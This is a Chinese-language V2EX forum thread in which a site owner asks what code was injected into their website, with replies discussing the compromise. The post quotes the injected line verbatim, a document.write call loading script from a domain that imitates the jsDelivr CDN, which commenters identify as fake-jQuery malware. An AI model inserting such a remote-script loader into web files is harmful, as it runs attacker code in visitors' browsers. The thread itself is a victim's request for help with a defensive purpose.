这是被挂了什么代码

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

推荐关注

› Meteor

› JSLint - a JavaScript code quality tool

› jsFiddle

› D3.js

› WebStorm

推荐书目

› JavaScript 权威指南第 5 版

› Closure: The Definitive Guide

这是一个创建于 750 天前的主题，其中的信息可能已经有所发展或是发生改变。

document.write(unescape("%3Cscript src='https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js'%3E%3C/script%3E"));

把加载的 js 最后全加了这个。

17 条回复 • 2022-11-14 12:08:38 +08:00

shuxhan

2022-10-26 12:28:19 +08:00

就是给网页添加了 jquery 库的引入标签，不过这样写的话，整个页面都废了全部被覆盖。

jalen

2022-10-26 12:32:26 +08:00

@shuxhan #1 我就是被挂了木马了。文件被修改了

kenvix

2022-10-26 12:39:00 +08:00

打开 https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js 显然这不是正常的 jquery 而是假装 jq 的马

jalen

2022-10-26 12:43:50 +08:00

@kenvix #3 这种情况大概率是怎么植入的，我现在不知道怎么防

illl

2022-10-26 12:47:43 +08:00 via iPhone

被 getshell 了吧，网站用的啥框架

mxT52CRuqR6o5

2022-10-26 12:50:36 +08:00

那可能性可多了

edis0n0

2022-10-26 13:17:22 +08:00

@kenvix #3 这个伪装不太行，以前我见过的伪装 jq 的马空 referrer 的时候都能返回真 jq

wtfedc

2022-10-26 15:24:43 +08:00

@jalen 如果博客开了评论，检查下 xss 。不过所有页面都有加的话，估计 webshell 早拿到了

learningman

2022-10-26 16:06:54 +08:00

头一回见到 autos 这个顶级域

wingor2015

2022-10-26 16:51:11 +08:00

遇到过一次是服务器上的代码被加了

jalen

2022-10-26 20:24:48 +08:00

我看了自己的文件就 js 被修改过，也没有新增文件。服务器也没被闯入的痕迹。这攻击点会在哪里？

hxy100

2022-10-27 02:26:47 +08:00

这个域名也很有迷惑性，仿知名 CDN 的域名 jsdelivr.com

MEIerer

2022-10-27 09:31:03 +08:00

我好久没中过木马了，现在装东西看见内存小的都会往哈勃测一下

jalen

2022-10-27 09:49:42 +08:00

@MEIerer #13 哈勃?什么东西

Trient

2022-10-27 13:47:08 +08:00

@jalen https://habo.qq.com/tool/index

siwi

2022-11-12 17:35:01 +08:00

找到问题所在了吗？我也是被挂了这个链接

jalen

2022-11-14 12:08:38 +08:00

@siwi 我不知道问题出在哪里，反正就先删了 js 。是不是 ftp 被干了，因为服务器没看到被破。